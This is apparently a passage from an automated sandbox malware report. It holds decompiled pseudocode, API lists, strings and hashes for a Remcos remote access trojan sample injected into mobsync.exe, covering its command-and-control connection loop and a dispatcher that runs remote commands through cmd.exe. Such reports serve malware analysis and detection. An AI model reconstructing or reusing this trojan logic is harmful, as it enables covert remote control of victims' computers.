						_t602 = L00402F73(_t373,  &_v212, L00402EFD( &_v188, L00402F73(_t373,  &_v260, L00402EFD( &_v284, L00402F73(_t373,  &_v308, L00402F73(_t373,  &_v332, L00402F73(_t373,  &_v356, L00402F73(_t373,  &_v380, L00402F73(_t373,  &_v404, E0040530D(_t373,  &_v428, L00402F73(_t373,  &_v452, L00402EFD( &_v476, L00402F73(_t373,  &_v500, L00402EFD( &_v524, L00402F73(_t373,  &_v548, E0040759E(_t373,  &_v572, L00402F73(_t373,  &_v596, L00402EFD( &_v620, L00402F73(_t373,  &_v644, L00402EFD( &_v668, L00402F73(_t373,  &_v692, L00402EFD( &_v716, L00402F73(_t373,  &_v740, L00402EFD( &_v764, L00402F73(_t373,  &_v788, E0040530D(_t373,  &_v812, L00402F73(_t373,  &_v836, E0040530D(_t373,  &_v860, L00402F73(_t373,  &_v884, L00402EFD( &_v908, L00402F73(_t373,  &_v932, L00402F73(_t373,  &_v956, L00402F73(_t373,  &_v980, L00402EFD( &_v1004, L00402F73(_t373,  &_v1028, L00402EFD( &_v1052, L00402F97( &_v1076,  &_v80, 0x46c238), _t254), _t705, 0x46c238), _t253), _t705, 0x46c238), _t705, 0x46c5b4), _t705, 0x46c238), _t252), _t705, 0x46c238), 0x46c238, _t705,  &_v164), _t705, 0x46c238), 0x46c238, _t705, "3.1.5 Pro"), _t705, 0x46c238), _t250), _t705, 0x46c238), _t249), _t705, 0x46c238), _t248), _t705, 0x46c238), _t247), _t705, 0x46c238), 0x46c238, _t705,  *0x46a9d4 & 0x000000ff), _t705, 0x46c238), _t244), _t705, 0x46c238), _t242), _t705, 0x46c238), 0x46c238, _t705,  &_v140), _t705, 0x46c238), _t705, _t239), _t705, 0x46c238), _t705, "Remcos-ZXIQGD"), _t705, 0x46c238), _t238), _t705, 0x46c238), _t237), _t705, 0x46c238);
						L00402F73(_t373, _t692, _t291, _t705,  &_v236);
						_push(0x4b);
						E00404A6E(_t373, 0x46c768, _t291, _t705);
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401FA7();
						L00401ED0();
						E00404B88(0x46c768, _t291, E00411D70, 1);
						_t345 =  *0x46bd48; // 0x0
						if(_t345 != 0 &&  *0x46bd4d != 0) {
							_t345 =  *_t345();
							 *0x46bd4d = 0;
						}
						if( *0x46c39a != 0) {
							_t345 = E00409520(_t373, 0x46c350);
						}
						E00405978(_t345);
						_t693 = _t692 - 0x18;
						E00402064(_t373, _t693, "Disconnected!");
						_t694 = _t693 - 0x18;
						E00402064(_t373, _t694, "[Info]");
						E004165D8(_t373, 0x46c238);
						_t680 = _t694 + 0x30;
						if( *0x46bea4 != 0) {
							CreateThread(0, 0, E0041601E, 0, 0, 0);
						}
						L00401FA7();
						L00401ED0();
					}
					_t667 = _v8;
					_t660 = 0x46c578;
				}
				_t667 = _t667 - 1;
				_v8 = _t667;
				_t373 = _t373 + 1;
				_t194 = E004021D5( &_v32);
				_t711 = _t373 - _t194;
				if(_t373 >= _t194) {
					_t196 = 2;
					_t373 = 0;
					_t200 = E00436079(_t197, L00401F75(L00401E29(_t660, _t602, _t711, _t196))) * 0x3e8;
					_t698 = _t200;
					Sleep(_t200);
				}
				L00401E54( &_v20, _t602);
				goto L4;
			}

0x00411325
0x00411328
0x00411333
0x0041133e
0x00411343
0x00411359
0x00411361
0x00411363
0x00411363
0x0041136a
0x0041136a
0x00411370
0x0041137a
0x00411383
0x00411388
0x0041138e
0x00411396
0x0041139b
0x0041139e
0x004113a2
0x004113a5
0x004113a9
0x004113ae
0x004113b5
0x004113ba
0x004113bc
0x004113c2
0x004113c9
0x004113da
0x004113e4
0x004113eb
0x004113fc
0x00411406
0x0041140d
0x0041141f
0x00411424
0x00411428
0x0041142d
0x00411430
0x00411430
0x00411432
0x00411432
0x0041143c
0x00411445
0x0041144a
0x00411450
0x00411458
0x0041145d
0x00411465
0x0041146a
0x00411471
0x0041147d
0x00411481
0x00411486
0x0041148d
0x004114a0
0x004114a7
0x004114aa
0x004114b3
0x004114ac
0x004114ac
0x004114ac
0x004114b8
0x004114bd
0x004114cb
0x00411505
0x00411509
0x0041150e
0x00411518
0x0041151d
0x00411522
0x00411528
0x00411530
0x00411538
0x0041153d
0x0041153d
0x00411542
0x00411548
0x00411555
0x0041155b
0x00411561
0x00411563
0x00411578
0x00411592
0x00411599
0x0041159f
0x004115a2
0x004115af
0x004115b0
0x004115b1
0x004115b2
0x004115ba
0x004115bf
0x004115c1
0x004115c7
0x004115d5
0x00411615
0x00411619
0x0041161e
0x00411628
0x0041162d
0x00411638
0x00411643
0x0041164e
0x00411659
0x0041165e
0x0041166f
0x00411671
0x00411674
0x00411675
0x00411676
0x00411677
0x00411678
0x0041167d
0x0041168b
0x0041169b
0x004116af
0x004116c6
0x004116d2
0x004116da
0x004116fd
0x00411702
0x00411707
0x00411713
0x00411713
0x00411718
0x0041171d
0x0041171f
0x00411721
0x00411725
0x00411725
0x00411730
0x00411735
0x00411751
0x00411765
0x0041177c
0x00411799
0x004117ad
0x004117c3
0x004117d0
0x004117e2
0x004117f2
0x00411802
0x00411822
0x00411835
0x00411847
0x00411a55
0x00411a59
0x00411a64
0x00411a68
0x00411a73
0x00411a7e
0x00411a89
0x00411a94
0x00411a9f
0x00411aaa
0x00411ab5
0x00411ac0
0x00411acb
0x00411ad6
0x00411ae1
0x00411aec
0x00411af7
0x00411b02
0x00411b0d
0x00411b18
0x00411b23
0x00411b2e
0x00411b39
0x00411b44
0x00411b4f
0x00411b5a
0x00411b65
0x00411b70
0x00411b7b
0x00411b86
0x00411b91
0x00411b9c
0x00411ba7
0x00411bb2
0x00411bbd
0x00411bc8
0x00411bd3
0x00411bde
0x00411be9
0x00411bf4
0x00411bff
0x00411c0a
0x00411c15
0x00411c20
0x00411c2b
0x00411c36
0x00411c41
0x00411c4c
0x00411c57
0x00411c62
0x00411c6d
0x00411c78
0x00411c83
0x00411c8b
0x00411c99
0x00411c9e
0x00411ca5
0x00411cb0
0x00411cb2
0x00411cb2
0x00411cc0
0x00411cc7
0x00411cc7
0x00411ccc
0x00411cd1
0x00411cdb
0x00411ce0
0x00411cea
0x00411cef
0x00411cf4
0x00411cfe
0x00411d0c
0x00411d0c
0x00411d15
0x00411d1d
0x00411d1d
0x00411d22
0x00411d25
0x00411d25
0x00411d2a
0x00411d2e
0x00411d31
0x00411d32
0x00411d37
0x00411d39
0x00411d3d
0x00411d41
0x00411d55
0x00411d55
0x00411d5d
0x00411d5d
0x00411d66
0x00000000

APIs

Sleep.KERNEL32(00000000,00000029,751443E0,0046C578,00000000), ref: 0041136A

Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2

gethostbyname.WS2_32(00000000), ref: 0041155B
htons.WS2_32(00000000), ref: 00411599
Sleep.KERNEL32(00000000,00000002), ref: 00411D5D

Part of subcall function 00410420: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,0046C518), ref: 0041043C
Part of subcall function 00410420: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 00410455
Part of subcall function 00410420: RegCloseKey.KERNEL32(00000000), ref: 00410460

GetTickCount.KERNEL32 ref: 0041178B

Part of subcall function 00404A6E: send.WS2_32 ref: 00404AE2

CreateThread.KERNEL32 ref: 00411D0C

Strings

C:\Windows\SysWOW64\mobsync.exe, xrefs: 00411728
Connected to , xrefs: 004115EB
Disconnected!, xrefs: 00411CD6
Remcos-ZXIQGD, xrefs: 00411774
%I64u, xrefs: 00411685
name, xrefs: 004116F1
(TLS), xrefs: 004114AC
[Info], xrefs: 00411513, 00411623, 00411CE5
3.1.5 Pro, xrefs: 00411809
Connecting to , xrefs: 004114E1

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: Sleep$CloseCountCreateLocalOpenQueryThreadTickTimeValuegethostbynamehtonssend
String ID: (TLS)$%I64u$3.1.5 Pro$C:\Windows\SysWOW64\mobsync.exe$Connected to $Connecting to $Disconnected!$Remcos-ZXIQGD$[Info]$name
API String ID: 2130001850-1095034368
Opcode ID: 91afc5b69a88027857b7466fa56600d313656a9ffe5476aaaecf7b813fe81f50
Instruction ID: 83ef738f165b9044fa0b5899371646b5f38477a05a31d0d6adf18a21a94f173f
Opcode Fuzzy Hash: 91afc5b69a88027857b7466fa56600d313656a9ffe5476aaaecf7b813fe81f50
Instruction Fuzzy Hash: CF427E71A002155ACB18F761DC56EEEB365AB50308F5041BFB40AB71E2EF7C5F86CA89

Uniqueness

Uniqueness Score: -1.00%

Function 004179B3, Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 134
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E004179B3(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v524;
				char _v544;
				char _v560;
				char _v572;
				void* _v576;
				char _v580;
				char _v584;
				char _v600;
				char _v608;
				char _v616;
				char _v620;
				void* _v624;
				char _v628;
				char _v632;
				char _v636;
				char _v644;
				void* _v648;
				char _v652;
				void* _v672;
				void* __ebx;
				signed int _t36;
				void* _t39;
				void* _t40;
				void* _t77;

				_t73 = __edx;
				_t77 = __ecx;
				_t54 = __edx;
				L00401F4D(__edx,  &_v644);
				_t36 = __edx + 0xffffffd0;
				_t85 = _t36 - 7;
				if(_t36 <= 7) {
					switch( *((intOrPtr*)(_t36 * 4 +  &M00417B8F))) {
						case 0:
							_push(L"Temp");
							goto L14;
						case 1:
							__ecx =  &_v620;
							__eax = E0041669D(__ebx,  &_v620);
							__ecx =  &_v644;
							__eax = L00401EDA( &_v644, __edx, __esi, __eax);
							goto L4;
						case 2:
							_push(L"SystemDrive");
							goto L14;
						case 3:
							_push(L"WinDir");
							goto L14;
						case 4:
							__eax = L00416F6C(__ecx);
							__eflags = __al;
							if(__eflags != 0) {
								__ecx =  &_v620;
								E0040425F(__ebx, __ecx, L"\\SysWOW64") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v580;
								__eax = E00403010( &_v580, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v584;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								L4:
								__ecx =  &_v620;
								goto L5;
							} else {
								__ecx =  &_v572;
								E0040425F(__ebx, __ecx, L"\\system32") = E0043918F(__ebx, __ecx, __eflags, L"WinDir");
								__ecx =  &_v600;
								__edx = __eax;
								__ecx =  &_v628;
								__eax = E00403010( &_v628, __edx, __eax);
								__ecx =  &_v652;
								__eax = L00401EDA( &_v652, __edx, __esi, __eax);
								__ecx =  &_v632;
								__eax = L00401ED0();
								__ecx =  &_v608;
								__eax = L00401ED0();
								__ecx =  &_v584;
								L5:
								__eax = L00401ED0();
								goto L15;
							}
							L16:
						case 5:
							_push(L"ProgramFiles");
							goto L14;
						case 6:
							_push(L"AppData");
							goto L14;
						case 7:
							_push(L"UserProfile");
							L14:
							L00409DCB(_t54,  &_v644, E0043918F(_t54, _t57, _t85));
							goto L15;
					}
				}
				L15:
				__imp__GetLongPathNameW(L00401ECB( &_v644),  &_v524, 0x208); // executed
				_t39 = E0040425F(_t54,  &_v560, _a4);
				_t40 = E0040425F(_t54,  &_v636, "\\");
				E00403010(_t77, E00403010( &_v600, L00417D4C(_t54,  &_v616, _t73, _t85,  &_v544, _t38), _t40), _t39);
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				L00401ED0();
				return _t77;
				goto L16;
			}

0x004179b3
0x004179c2
0x004179c4
0x004179ca
0x004179d2
0x004179d5
0x004179d8
0x004179de
0x00000000
0x004179e5
0x00000000
0x00000000
0x004179ef
0x004179f3
0x004179f9
0x004179fd
0x00000000
0x00000000
0x00417a10
0x00000000
0x00000000
0x00417a1a
0x00000000
0x00000000
0x00417a24
0x00417a29
0x00417a2b
0x00417a84
0x00417a93
0x00417a9a
0x00417aa3
0x00417aa5
0x00417aa9
0x00417ab0
0x00417ab4
0x00417ab9
0x00417abd
0x00417ac2
0x00417ac6
0x00417a02
0x00417a02
0x00000000
0x00417a2d
0x00417a32
0x00417a41
0x00417a48
0x00417a51
0x00417a53
0x00417a57
0x00417a5e
0x00417a62
0x00417a67
0x00417a6b
0x00417a70
0x00417a74
0x00417a79
0x00417a06
0x00417a06
0x00000000
0x00417a06
0x00000000
0x00000000
0x00417ad0
0x00000000
0x00000000
0x00417ad7
0x00000000
0x00000000
0x00417ade
0x00417ae3
0x00417aee
0x00000000
0x00000000
0x004179de
0x00417af3
0x00417b0a
0x00417b19
0x00417b28
0x00417b50
0x00417b5a
0x00417b63
0x00417b6c
0x00417b75
0x00417b7e
0x00417b8b
0x00000000

APIs

GetLongPathNameW.KERNEL32 ref: 00417B0A

Strings

AppData, xrefs: 00417AD7
SystemDrive, xrefs: 00417A10
ProgramFiles, xrefs: 00417AD0
WinDir, xrefs: 00417A1A, 00417A3C, 00417A8E
\SysWOW64, xrefs: 00417A7F
\system32, xrefs: 00417A2D
UserProfile, xrefs: 00417ADE
Temp, xrefs: 004179E5

Memory Dump Source

Source File: 00000008.00000002.491601903.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.492378547.000000000046F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_mobsync.jbxd

Yara matches

Similarity

API ID: LongNamePath
String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
API String ID: 82841172-1609423294
Opcode ID: 866ca35a7627739b5593dcad50cb3595cdade75a26c335f784ad72205b71e9e1
Instruction ID: 6472f6f80a3df67a90006e08033efa2a9a0bfe3ce3822e9bff2fa4fccbff765a
Opcode Fuzzy Hash: 866ca35a7627739b5593dcad50cb3595cdade75a26c335f784ad72205b71e9e1
Instruction Fuzzy Hash: 224126711082005AC314FB62DC52DEFB3A9AE90798F10093FF556620E2EE789F49C69B

Uniqueness

Uniqueness Score: -1.00%

Function 00411D70, Relevance: 11.0, APIs: 7, Instructions: 458
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E00411D70(void* __ebx, CHAR* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a32, intOrPtr _a603996450) {
				char _v116;
				char _v120;
				char _v140;
				char _v156;
				char _v164;
				void* _v172;
				char _v192;
				void* _v196;
				char _v212;
				char _v216;
				void* _v220;
				char _v240;
				void* _v244;
				char _v252;
				char _v264;
				void* _v268;
				void* _v284;
				char _v288;
				void* _v292;
				char _v304;
				char _v308;
				char _v312;
				char _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v364;
				char _v368;
				long _v372;
				int _v376;
				char _v396;
				char _v400;
				char _v404;
				int _v408;
				char _v412;
				char _v416;
				char _v420;
				char _v424;
				char _v428;
				char _v432;
				char _v436;
				char _v440;
				char _v444;
				char _v452;
				char _v500;
				char _v504;
				void* __esi;
				void* _t228;
				void* _t230;
				intOrPtr _t358;
				intOrPtr _t359;
				void* _t360;
				void* _t362;
				signed int _t363;
				signed int _t369;
				void* _t372;
				void* _t373;
				void* _t374;
				void* _t378;
				void* _t384;

				_t383 = __eflags;
				_t344 = __edx;
				_t278 = __ebx;
				_push(__ebx);
				_t358 = _a4;
				E004020CC(__ebx,  &_v308, __edx, __eflags, _t358 + 0x1c);
				SetEvent( *(_t358 + 0x34));
				_t359 =  *((intOrPtr*)(L00401F75( &_v312)));
				E00404286( &_v312,  &_v288, 4, 0xffffffff);
				_t372 = (_t369 & 0xfffffff8) - 0x18c;
				E004020CC(__ebx, _t372, _t344, _t383, 0x46c238);
				_t373 = _t372 - 0x18;
				E004020CC(__ebx, _t373, _t344, _t383,  &_v304);
				L00416DD0( &_v444, _t344);
				_t374 = _t373 + 0x30;
				_t384 = _t359 - 0x8f;
				if(_t384 > 0) {
					_t360 = _t359 + 0xffffff70;
					__eflags = _t360 - 0x22;
					if(__eflags <= 0) {
						switch( *((intOrPtr*)(( *(_t360 + 0x412eb0) & 0x000000ff) * 4 +  &M00412E64))) {
							case 0:
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 0);
								__eax = L00401F75(__ecx);
								__ecx = __eax;
								__eax = L00407F85(__ecx);
								goto L125;
							case 1:
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 0);
								__eax = L00401F75(__eax);
								__eax = StrToIntA(__eax);
								__ecx =  &_v424;
								__edi = __eax;
								__ecx = L00401E29( &_v424, __edx, __eflags, 1);
								__eax = L00401F75(__eax);
								__dl = 0x30;
								__ecx =  &_v408;
								__eax = E004179B3( &_v408, __edx, __eax);
								__ecx =  &_v408;
								__eax = L00401ECB( &_v408);
								__ecx =  &_v428;
								__esi = __eax;
								__eax = L00401E29( &_v428, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx = __esi;
								__eax = E004173A6(__esi);
								__esp = __esp + 0x18;
								__ecx =  &_v416;
								__edx = L00401ECB( &_v416);
								__ecx = __edi;
								__eax = E00417868(__edi, __edx);
								goto L105;
							case 2:
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 1);
								__eax = L00401F75(__eax);
								__ecx =  &_v424;
								__ecx = L00401E29( &_v424, __edx, __eflags, 0);
								__eax = L00401F75(__ecx);
								__eax = SetWindowTextW(__eax, __eax);
								goto L20;
							case 3:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00412EE4(__ebx, __edx);
								goto L102;
							case 4:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E00413012(__ecx, __eflags);
								goto L102;
							case 5:
								E004020CC(__ebx, _t374 - 0x18, _t344, __eflags, L00401E29( &_v420, _t344, __eflags, 0));
								E004068D2(_t344);
								goto L102;
							case 6:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00414D36(__edx);
								goto L102;
							case 7:
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = L00403FF3(__edx);
								goto L102;
							case 8:
								__eax = E0041601E(__ebx);
								goto L125;
							case 9:
								__eax = E0041614C(__ebx, __eflags);
								goto L125;
							case 0xa:
								__eax = E00416189(__eax);
								goto L125;
							case 0xb:
								__ebx = 0;
								__ecx =  &_v420;
								__ecx = L00401E29( &_v420, __edx, __eflags, 0);
								__eax = E004051EA(0);
								__ecx =  &_v428;
								__eflags =  *__eax - __bl;
								__ebx = 0 | __eflags != 0x00000000;
								__eax = L00401E29( &_v428, __edx, __eflags, 1);
								__dl = __bl;
								__ecx = __eax;
								__eax = E0041612B(__ecx, __edx, __edi, __esi);
								goto L125;
							case 0xc:
								__eax = E00416191(__edx);
								goto L125;
							case 0xd:
								__eax = L00405F2A(__ebx, __ecx, __edx);
								__ecx =  &_v420;
								__esi = __eax;
								__eax = L00401E29( &_v420, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx =  &_v340;
								__edi = __esp;
								__edx = __esi;
								__edx = L00416B7E(__ebx,  &_v340, __esi);
								__ecx =  &_v372;
								__edx = __eax;
								__ecx = __edi;
								__eax = L00402F73(__ebx, __edi, __edx, __eflags, __eax);
								_push(0xab);
								goto L124;
							case 0xe:
								__eflags =  *0x46bb07;
								if( *0x46bb07 != 0) {
									ShowWindow( *0x46bebc, 9) = SetForegroundWindow( *0x46bebc);
								} else {
									__cl = 1;
									__eax = E004188B1(__ebx, __ecx, __edx);
									__ebx = 0;
									__eax = CreateThread(0, 0, E00418680, 0, 0, 0);
									 *0x46bb07 = 2;
								}
								goto L125;
							case 0xf:
								_push(5);
								goto L16;
							case 0x10:
								__ebx = 0;
								_push(0);
								_push(0);
								goto L17;
							case 0x11:
								__ecx =  &_v116;
								__eax = E004072F8( &_v116);
								__ecx =  &_v420;
								__eax = L00401E29( &_v420, __edx, __eflags, 2);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v428;
								__eax = L00401E29( &_v428, __edx, __eflags, 1);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v436;
								__eax = L00401E29( &_v436, __edx, __eflags, 0);
								__esp = __esp - 0x18;
								__ecx = __esp;
								__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
								__ecx =  &_v140;
								__eax = L00405B86( &_v140, __edx);
								__ecx =  &_v212;
								__eax = L00407306(__ebx, __ecx, __esi);
								goto L125;
							case 0x12:
								goto L125;
						}
					}
					goto L125;
				} else {
					if(_t384 == 0) {
						L129();
						_v348 = E00436079(_t221, L00401F75(L00401E29( &_v420, _t344, __eflags, 2)));
						_v344 =  &_v120;
						E00413352(__ebx, _t344, 0x46c238, __eflags,  &_v348);
						_t118 = E0040805C() - 1; // -1
						_t362 = _t118;
						_t228 = L00401E29( &_v428, _t344, __eflags, 3);
						_t378 = _t374 - 0x18;
						E004020CC(_t278, _t378, _t344, __eflags, _t228);
						_t230 = L00401E29( &_v436, _t344, __eflags, 2);
						E004020CC(_t278, _t378 - 0x18, _t344, __eflags, _t230);
						E0040425F(_t278, _t378, L00401F75(L00401E29( &_v444, _t344, __eflags, 1)));
						E0040425F(_t278, _t378 - 0xffffffffffffffe8, L00401F75(L00401E29( &_v452, _t344, __eflags, 0)));
						E004077EE( &_v156, _t344, __eflags);
						__eflags = _v252;
						if(_v252 == 0) {
							E00408009( &_v420,  *((intOrPtr*)(L00407FE8(E00408070( &_v156,  &_v504),  &_v500, _t362))));
						}
						L00407FE0(_t278,  &_v212, _t362);
						goto L125;
					} else {
						_t363 = _t359 - 1;
						if(_t363 > 0x33) {
							L125:
							L00401E54( &_v420, _t344);
							L00401FA7();
							L00401FA7();
							return 0;
						} else {
							switch( *((intOrPtr*)(_t363 * 4 +  &M00412D94))) {
								case 0:
									_t247 = L00416B7E(0,  &_v368, GetTickCount());
									_t249 = L00416B7E(0,  &_v336, L00416B2E( &_v368));
									_t250 = E00416AF4( &_v140); // executed
									_t251 = L00416CF4(0,  &_v164, _t250);
									_t353 = L00402F73(0,  &_v404, L00402EFD( &_v264, L00402F73(0,  &_v240, L00402EFD( &_v216, L00402F97( &_v192, L00401E29( &_v420, _t250, _t385, 0), 0x46c238), _t251), _t385, 0x46c238), _t249), _t385, 0x46c238);
									L00402EFD(_t374 - 0x18, _t257, _t247);
									_push(0x4c);
									E00404A6E(0, 0x46c768, _t257, _t385); // executed
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401FA7();
									L00401ED0();
									L00401FA7();
									L00401FA7();
									_t271 = E00436079(_t269, L00401F75(L00401E29( &_v452, _t257, _t385, 1)));
									if(_t271 == 0) {
										L00401E29( &_v440, _t353, __eflags, 0);
										_t344 = "0";
										_t273 = E00405A22("0");
										__eflags = _t273;
										if(_t273 != 0) {
											_push(0);
											_t342 = 0x46c768;
											goto L10;
										}
									} else {
										_t344 = _t271 + _t271;
										if(E00404814(0x46c768) == 0) {
											E00404E64(0x46c768, _t344, 1);
										} else {
											L00404F77(0x46c238, _t344);
										}
									}
									goto L125;
								case 1:
									_push(0);
									__ecx = 0x46c768;
									L10:
									E004050E5(_t342, 0x46c238);
									goto L125;
								case 2:
									__ecx =  &_v368;
									__eax = E0041755D(__ebx,  &_v368);
									__esp = __esp - 0x18;
									__edx = __eax;
									__ecx = __esp;
									__eax = L00416CF4(__ebx, __esp, __edx);
									_push(0x33);
									__ecx = 0x46c768;
									__eax = E00404A6E(__ebx, 0x46c768, __edx, __eflags);
									__ecx =  &_v396;
									goto L106;
								case 3:
									goto L125;
								case 4:
									 &_v376 = GetCurrentProcessId();
									__eax = E0043A6FF(__ecx, __eax,  &_v376, 0xa);
									__esp = __esp - 0xc;
									__eax =  &_v376;
									__esi = __esp;
									__ecx =  &_v336;
									__edx = E0040D5B1(__ebx,  &_v336, __eflags);
									__ecx =  &_v368;
									__edx = __eax;
									__ecx = __esi;
									__eax = E0040530D(__ebx, __esi, __edx, __edi, __eflags,  &_v376);
									_push(0x4f);
									L124:
									__ecx = 0x46c768;
									__eax = E00404A6E(__ebx, 0x46c768, __edx, __eflags);
									__ecx =  &_v396;
									__eax = L00401FA7();
									__ecx =  &_v364;
									__eax = L00401FA7();
									goto L125;
								case 5:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__ecx = __eax;
									__eax = L00416B51(__ecx);
									goto L125;
								case 6:
									L20:
									__eax = E004132A8(__edx);
									goto L125;
								case 7:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__eax = CloseWindow(__eax);
									goto L125;
								case 8:
									_push(3);
									goto L16;
								case 9:
									_push(9);
									L16:
									_push(0);
									L17:
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags);
									__eax = L00401F75(__ecx);
									__eax = ShowWindow(__eax, ??);
									goto L125;
								case 0xa:
									__eax =  &_v372;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__ecx);
									__eax = GetWindowThreadProcessId(__eax,  &_v372);
									__ecx = _v376;
									__eax = L00416B51(_v376);
									goto L20;
								case 0xb:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									__eax = L00401F75(__eax);
									__ecx =  &_v340;
									__eax = E0040425F(0,  &_v340, __eax);
									__edx = L"/C ";
									__ecx =  &_v376;
									__ecx = __eax;
									__eax = ShellExecuteW(0, L"open", L"cmd.exe", __eax, 0, 0);
									__ecx =  &_v376;
									__eax = L00401ED0();
									__ecx =  &_v344;
									goto L106;
								case 0xc:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 1);
									__ecx = 0x46c2d0;
									__eax = L00401F8D(0x46c2d0, __eax);
									__eflags =  *0x46bae3 - __bl;
									if(__eflags == 0) {
										__ecx =  &_v420;
										__eax = L00401E29( &_v420, __edx, __eflags, 0);
										__esp = __esp - 0x18;
										__ecx = __esp;
										__eax = E0040559D();
										goto L102;
									}
									goto L125;
								case 0xd:
									__ebx = 0;
									__ecx =  &_v420;
									__ecx = L00401E29( &_v420, __edx, __eflags, 0);
									L00401F75(__ecx) = ShellExecuteW(0, L"open", __eax, 0, 0, 1);
									goto L125;
								case 0xe:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c850;
									__eax = L00401F8D(0x46c850, __eax);
									__ecx =  &_v428;
									__ecx = L00401E29( &_v428, __edx, __eflags, 3);
									__eax = L00401F75(__ecx);
									__esi = __eax;
									__eax = L00413EBE(__edx, __edi, __eax);
									__ecx =  &_v432;
									__ecx = L00401E29( &_v432, __edx, __eflags, 2);
									__eax = L00401F75(__ecx);
									__eax = E00436079(__ecx, __eax);
									__eflags = __eax;
									__ecx =  &_v436;
									_t57 = __eax != 0;
									__eflags = _t57;
									__ebx = 0 | _t57;
									__ecx = L00401E29( &_v436, __edx, _t57, 1);
									L00401F75(__ecx) = E00436079(__ecx, __eax);
									__dl = __bl;
									__cl = __al;
									__eax = L00413F3B(__ecx, __edx, __eflags, __esi);
									goto L26;
								case 0xf:
									 *0x46bd6a = 1;
									__eax = __eax + 0x46bd6a;
									__ecx = __ecx + __ebp;
									 *0x00000000 =  *0x00000000 | 0x006a0000;
									__eflags =  *0x00000000;
									goto L125;
								case 0x10:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__esp = __esp - 0x18;
									__ecx = __esp;
									__eax = E004020CC(__ebx, __esp, __edx, __eflags, __eax);
									__ecx = 0x46c350;
									__eax = E0040857F(0x46c350, __edx);
									goto L125;
								case 0x11:
									__ecx = 0x46c350;
									__eax = E004093AF(0x46c350);
									goto L125;
								case 0x12:
									__ecx = 0x46c350;
									__eax = E00409520(__ebx, 0x46c350);
									goto L125;
								case 0x13:
									__ecx =  &_v420;
									__eax = L00401E29( &_v420, __edx, __eflags, 0);
									__ecx = 0x46c3e0;
